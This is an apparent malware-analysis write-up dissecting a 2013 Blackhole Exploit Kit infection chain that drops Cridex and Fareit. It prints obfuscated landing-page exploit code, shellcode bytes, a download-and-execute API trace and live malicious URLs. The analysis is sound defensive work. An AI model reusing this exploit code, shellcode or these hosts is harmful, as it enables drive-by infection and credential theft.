A Guide to flush infectors & payload at BHEK Infection on dekamerionka.ru:8080

Infection of Cridex Trojan dropping Fareit Credential Stealer 2013 Jan 14th

Virus Total:
[Payload] [Landing Page] [SWF1] [SWF2] [PDF1] [PDF2] [JAR1] [JAR2/0day]

Exploit Infector Code Screenshot Pictures:
[SWF1] [SWF2] [PDF1] [PDF2] [JAR1] [JAR2/0day]

Sample Download--->>[MEDIAFIRE]

Guide & Log: (I'm sorry for using plain text as the report.. lack of time)
=======================================================
#MalwareMustDie - Infection of Blackhole EK via Spam
Landing page: dekamerionka.ru:8080
IP: 81.31.47.124, 91.224.135.20, 212.112.207.15
A guide to flush the Blackhole Payload & Infectors...
@unixfreaxjp /malware]$ date
Tue Jan 15 23:05:49 JST 2013
=======================================================
 
Infector URLs...
 
h00p://ideawiz.org/letter.htm
h00p://threesaints.org.uk/letter.htm
h00p://masreptiles.terrarium.pl/letter.htm
 
// All of the dirty stuff's download URLs:
 
PD-079  : h00p://dekamerionka.ru:8080/forum/links/column.php
jar     : h00p://dekamerionka.ru:8080/forum/links/column.php?cabimab=lij&ymwbck=rpe
payload : h00p://dekamerionka.ru:8080/forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l
swf1    : h00p://dekamerionka.ru:8080/forum/links/column.php?cphwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy
swf2    : h00p://dekamerionka.ru:8080/forum/links/column.php?jkmflr=30:1n:1i:1i:33&boqrjhrc=3b:3m:37:3m&rshcr=2v:1k:1m:32:33:1k:1k:31:1j:1o&jfwxwr=gcp
pdf1    : h00p://dekamerionka.ru:8080/forum/links/column.php?cdaa=30:1n:1i:1i:33&nzhwe=3k:3j:3j&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=1k:1d:1f:1d:1g:1d:1f
pdf2    : h00p://dekamerionka.ru:8080/forum/links/column.php?yjjdw=30:1n:1i:1i:33&wjqofll=3c&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=1k:1d:1f:1d:1g:1d:1f
 
// infector page access...
 
--20:26:45--  h00p://threesaints.org.uk/letter.htm
           => `letter.htm'
Resolving threesaints.org.uk... seconds 0.00, 173.254.28.107
Caching threesaints.org.uk => 173.254.28.107
Connecting to threesaints.org.uk|173.254.28.107|:80... seconds 0.00, connected.
  :
GET /letter.htm HTTP/1.0
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: threesaints.org.uk
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Date: Tue, 15 Jan 2013 11:26:45 GMT
Server: Apache
Last-Modified: Tue, 15 Jan 2013 11:14:17 GMT
ETag: "4f03efb-1a9-4d351dcda592d"
Accept-Ranges: bytes
Content-Length: 425
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
Content-Type: text/html
  :
200 OK
Length: 425 [text/html]
"20:26:47 (11.89 MB/s) - letter.htm saved [425/425]"
 
 
// it was serving this code...
 
<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8"
<title>Please wait</title>
 </head>
 <body> 
<h2><b>Please wait a moment ...  You will be forwarded. </h2></b>
<h5>Internet Explorer and Mozilla Firefox compatible only</h5><br>
 
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://dekamerionka.ru:8080/forum/links/column.php";}
</script>
 
</body>
</html>
 
-----------------------------------------------------------
// which forwards you to the BHEK landing page....
--20:28:05--  h00p://dekamerionka.ru:8080/forum/links/column.php
           => `column.php
Resolving dekamerionka.ru... seconds 0.00, 81.31.47.124, 91.224.135.20, 212.112.207.15
Caching dekamerionka.ru => 81.31.47.124 91.224.135.20 212.112.207.15
Connecting to dekamerionka.ru|81.31.47.124|:8080... seconds 0.00, connected.
  :
GET /forum/links/column.php HTTP/1.0
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: dekamerionka.ru:8080
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 11:28:04 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
  :
200 OK
Length: unspecified [text/html]
"20:28:07 (69.85 KB/s) - column.php saved [117566]"
A new obfuscation of the BHEK landing page.. this is the first time I have seen it:
<html><head><title></title></head><body>
<applet code="hw" archive="/forum/links/column.php?cabimab=lij&y..
<param name="val" value="Dyy3OjjMeqV0el8toqV..
<param value="" name="prime"
<script>function c(){if(window.document)s+=String.fromCharCode(a..
var a = "!!8:97:!!4:32:80:!08:!!7:!03:!05:!!0:68:!0!:!!6:!0!:99:..
!6:!2!:!!2:!0!:!!!:!02:32:98:6!:6!:34:!02:!!7:!!0:99:!!6:!05:!!!..
98:4!:63:40:!00:46:!05:!!5:68:!0!:!02:!05:!!0:!0!:!00:40:99:4!:6..
3:!20:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:77:97:!!6:!04:46:!0..
:48:34:93:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:52:59:97:43:43:..
:!!5:93:47:46:!!6:!0!:!!5:!!6:40:!00:9!:98:93:4!:4!:!23:!02:6!:!..
0:97:46:!08:!0!:!!0:!03:!!6:!04:59:!02:43:43:4!:!23:!09:6!:97:9!..
      :
...73:!!0:!02:!!!:46:!06:97:!!4:34:4!:59";
 
 
a=a.replace(/!/g,1)[sp](":");
for(i=0,s="";i<a.length;i++){
 c();
}
z=true;
try{document.createElement("span");}catch(q){z=false;}
if(window.document)if(z)e(s);
  </script></body></html>
Landing page structure:
   :
// applet
<applet code="hw" archive="/forum/links/column.php?cabimab=lij&ymwbck=rpe"
<param name="val" value="Dyy3OjjMeqV0el8toqVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xA.b1fO6oO68O68O11RtebhvO6qO60O1hO11O6qO6qO16O6CO6tRVb6.RAtboRqvb-"/>
<param value="" name="prime" />
</applet>
 
   :
 
// first script
 function c()
 {
   if(window.document)s+=String.fromCharCode(a[i]);
 
 }
 e=eval;
 sp="split";
  
 
// soon followed by second script+obfuscation data:
var a = "!!8:97:!!4:32:80:!08:!!.....:97:!!4:34:4!:59";
 
// generator..
 a=a.replace(/!/g,1)[sp](":");
 for(i=0,s="";i<a.length;i++)
 {
   c();
 }
 z=true;
 try
 {
   document.createElement("span");
 }
 catch(q)
 {
   z=false;
 }
 if(window.document)if(z)e(s);
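The decoder above can be replayed offline instead of letting `e(s)` eval the result. This added Python example (not from the original post) does that, and on the visible head of the `a` string it recovers `var PluginDetec`, the start of the PluginDetect library that the landing page later drives through `onDetectionDone`; the HTML snippet inside is constructed from the page's excerpt.

```python
import re

# Constructed sample: the first 15 fields of the landing page's "a" string
# (the page truncates the real string after a few lines).
CHARCODE_SAMPLE = "!!8:97:!!4:32:80:!08:!!7:!03:!05:!!0:68:!0!:!!6:!0!:99"

# Constructed sample of the surrounding script, using the same short blob.
LANDING_SAMPLE = (
    "<script>function c(){if(window.document)s+=String.fromCharCode(a[i]);}\n"
    "e=eval;sp=\"split\";\n"
    "var a = \"" + CHARCODE_SAMPLE + "\";\n"
    "a=a.replace(/!/g,1)[sp](\":\");for(i=0,s=\"\";i<a.length;i++){c();}\n"
    "if(window.document)e(s);</script>"
)

_VAR_A = re.compile(r'var\s+a\s*=\s*"([0-9!:]+)"')


def decode_charcodes(blob):
    """Replay the landing page's decoder without eval: every '!' is a
    disguised '1' (a.replace(/!/g,1)), the string is split on ':' and each
    field is a decimal char code fed to String.fromCharCode."""
    fields = blob.replace("!", "1").split(":")
    return "".join(chr(int(f)) for f in fields if f)


def extract_payload_script(html):
    """Pull the obfuscated 'a' string out of a captured landing page and
    return the JavaScript that e(s) would have executed, or None."""
    m = _VAR_A.search(html)
    return decode_charcodes(m.group(1)) if m else None
```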
The summary of the infection method used in this landing page.
// From this landing page we will get the following infections:
 
// 1. The applet in the HTML landing page infects you with -
 
// - the first jar infection (it has the Java 0day jar here..)
    <applet code="hw" archive="/forum/links/column.php?cabimab=lij&ymwbck=rpe"
    <param name="val" value="Dyy3OjjMeqV0el8toqVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xA.b1fO6oO68O68O11RtebhvO6qO60O1hO11O6qO6qO16O6CO6tRVb6.RAtboRqvb-"/>
    <param value="" name="prime" /></applet>
 
// 2. The obfuscated landing page infects you with:
 
// the flash/swf SWF1 exploit.....
   function getCN()
   { return "/forum/links/column.php?cphwe=" + x("c833f") + "&tgou=" + x("kqddo") +
     "&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy" }
 
// pdf1
   function p1(){
   var d = document.createElement("object");
   d.setAttribute("data", "/forum/links/column.php?cdaa=" + x("c833f") + "&nzhwe=" + x(  "wvv") + "&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=" + x(pdfver.join(".")));
   d.setAttribute("type", "application/pdf");
   document.body.appendChild(d);}
 
// pdf2
   function p2(){
   var d = document.createElement("object");
   d.setAttribute("data", "/forum/links/column.php?yjjdw=" + x("c833f") + "&wjqofll=" + x(  "o") + "&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=" + x(pdfver.join(".")));
   d.setAttribute("type", "application/pdf");
   document.body.appendChild(d);
}
 
// flash/swf SWF2 exploit....
   function ff2(){
   var oSpan = document.createElement("span");
   var url = "/forum/links/column.php?jkmflr=" + x("c833f") + "&boqrjhrc=" + x("nyjy") +   "&rshcr=2v:1k:1m:32:33:1k:1k:31:1j:1o&jfwxwr=gcp";
   oSpan.innerHTML = "
    <object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'>
    <param name='movie' value='" + url + "' />
    <param name='allowScriptAccess' value='always' />
    <param name='Play' value='0' />
    <embed src='" + url + "' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash' width='10' height='10'>
    </embed></object>
    ";
    document.body.appendChild(oSpan);  }
 
// the shellcode (used by the other exploits as the key to the payload)
   function getShellCode(){
   var a = "8200!%4482!%e551!%e034!%5164!%f474!...!%1414!%".split("").
   reverse().join("");
   return a["replace"](/\%!/g, "%" + "u")  }
 
// and a jar component that detects your Java version
   $$["onDetec" + "tionDone"]("Ja" + "va", svwrbew6436b, "../data/getJavaInfo.jar");
Shellcode & Payload:
// change the code to the snippet below & see the decoded shellcode:
 
var a = "8200!%4482!...!%1414!%".split("").reverse().join("");
var xxx=a["replace"](/\%!/g, "%" + "u");
document.write(xxx);
 
// output:
 
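The reverse-and-replace trick in getShellCode() can be undone without a browser. This added Python example (not part of the original post) does so and also writes the %uXXYY words out little-endian, which is the byte order the CPU actually sees; the sample string is constructed from the visible head and tail of the page's string, with the elided middle left out.

```python
import re
import struct

# Constructed sample: the head and the tail of the landing page's reversed
# shellcode string (the real string's middle is elided on the page).
OBFUSCATED_SAMPLE = "8200!%4482!%e551!%e034!%5164!%f474!%6638!%1414!%1414!%"

_UNICODE_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})")


def deobfuscate(obf):
    """Undo getShellCode(): reverse the string, then turn the '%!' marker
    back into the '%u' escape (split("").reverse().join("") followed by
    replace(/%!/g, "%u") in the landing page)."""
    return obf[::-1].replace("%!", "%u")


def unescape_to_bytes(escaped):
    """Turn a %uXXYY string into the bytes the CPU executes. unescape()
    yields 16-bit code units that the heap spray stores little-endian,
    so %u8366 must become the bytes 66 83, not 83 66."""
    out = bytearray()
    pos = 0
    for m in _UNICODE_ESCAPE.finditer(escaped):
        if m.start() != pos:
            raise ValueError(f"non-%u data at offset {pos}")
        out += struct.pack("<H", int(m.group(1), 16))
        pos = m.end()
    if pos != len(escaped):
        raise ValueError(f"trailing data at offset {pos}")
    return bytes(out)


def decode_shellcode(obf):
    """Obfuscated string from the landing page -> raw shellcode bytes,
    ready for a disassembler or an emulator such as libemu."""
    return unescape_to_bytes(deobfuscate(obf))
```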
 
--------------------------------------------------------------------------------
 
 
// #Tips: if you want to use libemu to crack this, I made the format below for you..
 
import pylibemu

# Shellcode bytes taken straight from the decoded %uXXYY string.
# Each %uXXYY escape is a 16-bit little-endian word, so the byte pairs
# below are still in "XX YY" order and are swapped before emulation.
shellcode = b"\x41\x41\x41\x41\x83\x66\xfc\xe4\xeb\xfc\x58\x10\xc9\x31\x81\x66\x09\xe9\x80\xfe\x28\x30\xe2\x40\xeb\xfa\xe8\x05\xff\xeb"
shellcode += b"\xff\xff\xcc\xad\x1c\x5d\x77\xc1\xe8\x1b\xa3\x4c\x18\x68\x68\xa3\xa3\x24\x34\x58\xa3\x7e\x20\x5e\xf3\x1b\xa3\x4e\x14\x76"
shellcode += b"\x5c\x2b\x04\x1b\xc6\xa9\x38\x3d\xd7\xd7\xa3\x90\x18\x68\x6e\xeb\x2e\x11\xd3\x5d\x1c\xaf\xad\x0c\x5d\xcc\xc1\x79\x64\xc3"
shellcode += b"\x7e\x79\x5d\xa3\xa3\x14\x1d\x5c\x2b\x50\x7e\xdd\x5e\xa3\x2b\x08\x1b\xdd\x61\xe1\xd4\x69\x2b\x85\x1b\xed\x27\xf3\x38\x96"
shellcode += b"\xda\x10\x20\x5c\xe3\xe9\x2b\x25\x68\xf2\xd9\xc3\x37\x13\xce\x5d\xa3\x76\x0c\x76\xf5\x2b\xa3\x4e\x63\x24\x6e\xa5\xd7\xc4"
shellcode += b"\x0c\x7c\xa3\x24\x2b\xf0\xa3\xf5\xa3\x2c\xed\x2b\x76\x83\xeb\x71\x7b\xc3\xa3\x85\x08\x40\x55\xa8\x1b\x24\x2b\x5c\xc3\xbe"
shellcode += b"\xa3\xdb\x20\x40\xdf\xa3\x2d\x42\xc0\x71\xd7\xb0\xd7\xd7\xd1\xca\x28\xc0\x28\x28\x70\x28\x42\x78\x40\x68\x28\xd7\x28\x28"
shellcode += b"\xab\x78\x31\xe8\x7d\x78\xc4\xa3\x76\xa3\xab\x38\x2d\xeb\xcb\xd7\x47\x40\x28\x46\x40\x28\x5a\x5d\x45\x44\xd7\x7c\xab\x3e"
shellcode += b"\x20\xec\xc0\xa3\x49\xc0\xd7\xd7\xc3\xd7\xc3\x2a\xa9\x5a\x2c\xc4\x28\x29\xa5\x28\x0c\x74\xef\x24\x0c\x2c\x4d\x5a\x5b\x4f"
shellcode += b"\x6c\xef\x2c\x0c\x5a\x5e\x1a\x1b\x6c\xef\x20\x0c\x05\x08\x08\x5b\x40\x7b\x28\xd0\x28\x28\x7e\xd7\xa3\x24\x1b\xc0\x79\xe1"
shellcode += b"\x6c\xef\x28\x35\x58\x5f\x5c\x4a\x6c\xef\x2d\x35\x4c\x06\x44\x44\x6c\xee\x21\x35\x71\x28\xe9\xa2\x18\x2c\x6c\xa0\x2c\x35"
shellcode += b"\x79\x69\x28\x42\x28\x42\x7f\x7b\x28\x42\x7e\xd7\xad\x3c\x5d\xe8\x42\x3e\x7b\x28\x7e\xd7\x42\x2c\xab\x28\x24\xc3\xd7\x7b"
shellcode += b"\x2c\x7e\xeb\xab\xc3\x24\xc3\x2a\x6f\x3b\x17\xa8\x5d\x28\x6f\xd2\x17\xa8\x5d\x28\x42\xec\x42\x28\xd7\xd6\x20\x7e\xb4\xc0"
shellcode += b"\xd7\xd6\xa6\xd7\x26\x66\xb0\xc4\xa2\xd6\xa1\x26\x29\x47\x1b\x95\xa2\xe2\x33\x73\x6e\xee\x1e\x51\x07\x32\x40\x58\x5c\x5c"
shellcode += b"\x12\x58\x07\x07\x4d\x4c\x49\x43\x4d\x45\x41\x5a\x46\x47\x49\x43\x5a\x06\x12\x5d\x18\x10\x18\x10\x4e\x07\x5a\x47\x45\x5d"
shellcode += b"\x44\x07\x46\x41\x5b\x43\x4b\x07\x44\x47\x45\x5d\x06\x46\x40\x58\x17\x58\x4e\x4f\x1b\x15\x12\x18\x46\x19\x19\x12\x12\x41"
shellcode += b"\x41\x19\x1b\x12\x0e\x1b\x4d\x47\x1a\x15\x12\x5e\x43\x19\x19\x12\x12\x45\x1a\x1b\x1b\x12\x12\x1b\x43\x19\x19\x12\x12\x43"
shellcode += b"\x19\x1b\x19\x12\x12\x42\x47\x19\x49\x0e\x19\x15\x0e\x43\x47\x4f\x46\x15\x43\x0e\x15\x5e\x28\x44\x00\x28"

# Swap every byte pair (XX YY -> YY XX) so the buffer matches the saved
# binary (41 41 41 41 66 83 e4 fc ...).
shellcode = b"".join(shellcode[i + 1:i + 2] + shellcode[i:i + 1]
                     for i in range(0, len(shellcode), 2))

emulator = pylibemu.Emulator()
# locate the GetPC instruction of the decoder stub; -1 means none was found
offset = emulator.shellcode_getpc_test(shellcode)
print("getpc offset:", offset)

if offset >= 0:
    emulator.prepare(shellcode, offset)
    emulator.test()
    # API call trace (LoadLibraryA, URLDownloadToFileA, WinExec, ...)
    print(emulator.emu_profile_output)
----------------------------------------------------------------------------
// my way is...
// save the binary and disassemble it..
----------------------------------------------------------------------------
 
 
-------------------------------------------------------------------
 
// see the payload URL in the urlmon.URLDownloadToFileA call at 0x1a494bbe below? ↓
 
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://dekamerionka.ru:8080/forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) 0
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
// payload is here..
h00p://dekamerionka.ru:8080/forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l
 
// download...
 
--21:33:38--  h00p://dekamerionka.ru:8080/forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l
           => `column.php@gf=30%3A1n%3A1i%3A1i%3A33&oe=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&a=1k&go=n&kv=l
Resolving dekamerionka.ru... seconds 0.00, 212.112.207.15, 81.31.47.124, 91.224.135.20
Caching dekamerionka.ru => 212.112.207.15 81.31.47.124 91.224.135.20
Connecting to dekamerionka.ru|212.112.207.15|:8080... seconds 0.00, connected.
  :
GET /forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l HTTP/1.0
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: dekamerionka.ru:8080
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 12:33:36 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Tue, 15 Jan 2013 12:33:37 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename=calc.exe
Content-Transfer-Encoding: binary
Content-Length: 140288
200 OK
Length: 140,288 (137K) [application/x-msdownload]
100%[====================================>] 140,288       64.83K/s
21:33:42 (64.73 KB/s) - `calc.exe' saved [140288/140288]
Getting infector components
    :
// let's get the SWF1...
// I prefer to check the obfuscated link in the function below:
 
function getCN(){
  return "/forum/links/column.php?cphwe=" + x("c833f") + "&tgou=" + x("kqddo") +
  "&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy" }
 
// it uses function x, so let's use it too to decode the values in the URL string..
 
// x() writes each character's char code in base 33 and joins them with ':'
function x(s){
  d = [];
  for (i = 0; i < s.length; i++){
    k = (s.charCodeAt(i)).toString(33);
    d.push(k);
  }
  return d.join(":");
}
var xxx = "/forum/links/column.php?cphwe=" + x("c833f") + "&tgou=" + x("kqddo") + "&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy";
document.write(xxx);
 
// result:
/forum/links/column.php?cphwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy
 
//download it...
h00p://dekamerionka.ru:8080/forum/links/column.php?cphwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy
GET /forum/links/column.php?cphwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy HTTP/1.0
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: dekamerionka.ru:8080
Connection: Keep-Alive
   :
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 12:50:12 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 7238
200 OK
Registered socket 1896 for persistent reuse.
Length: 7,238 (7.1K) [text/html]
100%[====================================>] 7,238         22.73K/s
 
// Get the SWF2 Infector,..
 
// same method...
h00p://dekamerionka.ru:8080/forum/links/column.php?jkmflr=30:1n:1i:1i:33&boqrjhrc=3b:3m:37:3m&rshcr=2v:1k:1m:32:33:1k:1k:31:1j:1o&jfwxwr=gcp
 
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 12:51:12 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 946
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 946 [text/html]
100%[====================================>] 946           --.--K/s
21:51:14 (26.47 MB/s) - "column.php@jkmflr=30%3A1n%3A1i%3A1i%3A33&boqrjhrc=3b%3A3m%3A37%3A3m&rshcr=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&jfwxwr=gcp" saved [946/946]
 
 
// Get the PDF 1 & 2 infectors..., knowing that the value of x(pdfver.join(".")) is "1k:1d:1f:1d:1g:1d:1f"
 
/forum/links/column.php?cdaa=" + x("c833f") + "&nzhwe=" + x(  "wvv") + "&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=" + "1k:1d:1f:1d:1g:1d:1f"
/forum/links/column.php?yjjdw=" + x("c833f") + "&wjqofll=" + x(  "o") + "&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=" + "1k:1d:1f:1d:1g:1d:1f"
   
h00p://dekamerionka.ru:8080/forum/links/column.php?cdaa=30:1n:1i:1i:33&nzhwe=3k:3j:3j&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=1k:1d:1f:1d:1g:1d:1f
h00p://dekamerionka.ru:8080/forum/links/column.php?yjjdw=30:1n:1i:1i:33&wjqofll=3c&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=1k:1d:1f:1d:1g:1d:1f
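Decoding the x()-encoded parameters in the SWF and PDF URLs above (including the pdfver value) is easier without a browser: this added Python example, not from the original post, reimplements x() and its inverse and decodes every parameter of a captured URL, leaving values that are not base-33 encoded untouched. The two URLs inside are the page's own.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Taken from the URLs listed on this page.
SWF1_URL = ("h00p://dekamerionka.ru:8080/forum/links/column.php?cphwe=30:1n:1i:1i:33"
            "&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy")
PDF1_URL = ("h00p://dekamerionka.ru:8080/forum/links/column.php?cdaa=30:1n:1i:1i:33"
            "&nzhwe=3k:3j:3j&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=1k:1d:1f:1d:1g:1d:1f")

_DIGITS = "0123456789abcdefghijklmnopqrstuvw"       # JavaScript's base-33 alphabet
_ENCODED = re.compile(r"^[0-9a-w]{1,3}(:[0-9a-w]{1,3})*$")


def x(s):
    """The landing page's x(): each char code written in base 33, ':'-joined."""
    parts = []
    for ch in s:
        n, tok = ord(ch), ""
        while True:
            n, rem = divmod(n, 33)
            tok = _DIGITS[rem] + tok
            if n == 0:
                break
        parts.append(tok)
    return ":".join(parts)


def unx(token):
    """Inverse of x(): '30:1n:1i:1i:33' -> 'c833f'. Returns None when the
    value is not in that form or does not decode to printable ASCII
    (so plain values such as 'n' or 'lij' are not mis-decoded)."""
    if not _ENCODED.match(token):
        return None
    text = "".join(chr(int(p, 33)) for p in token.split(":"))
    return text if all(32 <= ord(c) < 127 for c in text) else None


def decode_query(url):
    """Map every parameter of a BHEK-style URL to its decoded value."""
    out = {}
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        decoded = unx(value)
        out[key] = value if decoded is None else decoded
    return out
```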
 
// shortly, the download logs..
 
     :
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 13:05:17 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 21575
ETag: "18f8a6bcd64232c6eeead1d0a2c5cd62"
Last-Modified: Tue, 15 Jan 2013 13:05:17 GMT
Accept-Ranges: bytes
200 OK
Registered socket 1896 for persistent reuse.
Length: 21,575 (21K) [application/pdf]
100%[====================================>] 21,575        40.09K/s
   :
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 13:05:58 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Accept-Ranges: bytes
Content-Length: 9781
Content-Disposition: inline; filename=b76cb.pdf
200 OK
Registered socket 1896 for persistent reuse.
Length: 9,781 (9.6K) [application/pdf]
100%[====================================>] 9,781         59.75K/s
 
 
// And the JAR...
 
// see the applet url...
<applet code="hw" archive="/forum/links/column.php?cabimab=lij&ymwbck=rpe"
<param name="val" value="Dyy3OjjMeqV0el8toqVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xA.b1fO6oO68O68O11RtebhvO6qO60O1hO11O6qO6qO16O6CO6tRVb6.RAtboRqvb-"/>
<param value="" name="prime" /></applet>
 
http://dekamerionka.ru:8080/forum/links/column.php?cabimab=lij&ymwbck=rpe
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 13:32:09 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 20 [text/html]
100%[====================================>] 20            --.--K/s
22:27:08 (659.56 KB/s) - `column.php@cabimab=lij&ymwbck=rpe.2' saved [20/20]
 
// hmm.. the jar download looks like it failed.. :-( Let's reset the "request":
 
 
// retry - try1 (old java version)
 
--16:24:19--  http://dekamerionka.ru:8080/forum/links/column.php?cabimab=lij&ymwbck=rpe
           => "column.php@cabimab=lij&ymwbck=rpe"
Resolving dekamerionka.ru... seconds 0.00, 212.112.207.15, 81.31.47.124, 91.224.135.20
Caching dekamerionka.ru => 212.112.207.15 81.31.47.124 91.224.135.20
Connecting to dekamerionka.ru|212.112.207.15|:8080... seconds 0.00, connected.
  :
GET /forum/links/column.php?cabimab=lij&ymwbck=rpe HTTP/1.0
User-Agent: MalwareMustDie!
Host: dekamerionka.ru:8080
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Wed, 16 Jan 2013 07:24:15 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 16786
ETag: "e3ffc7e6bc6f654d51dd5bb7658ae853"
Last-Modified: Wed, 16 Jan 2013 07:24:16 GMT
Accept-Ranges: bytes
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 16,786 (16K) [application/java-archive]
"16:24:21 (26.42 KB/s) - `try1.jar' saved [16786/16786]"
 
// retry - try2 (newer java version)
 
--17:06:01--  http://dekamerionka.ru:8080/forum/links/column.php?cabimab=lij&ymwbck=rpe
           => "column.php@cabimab=lij&ymwbck=rpe"
Resolving dekamerionka.ru... seconds 0.00, 91.224.135.20, 212.112.207.15, 81.31.47.124
Caching dekamerionka.ru => 91.224.135.20 212.112.207.15 81.31.47.124
Connecting to dekamerionka.ru|91.224.135.20|:8080... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5b20 (new refcount 1).
  :
GET /forum/links/column.php?cabimab=lij&ymwbck=rpe HTTP/1.0
User-Agent: MalwareMustDie!
Host: dekamerionka.ru:8080
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Wed, 16 Jan 2013 08:11:06 GMT
Content-Type: application/java-archive
Connection: keep-alive
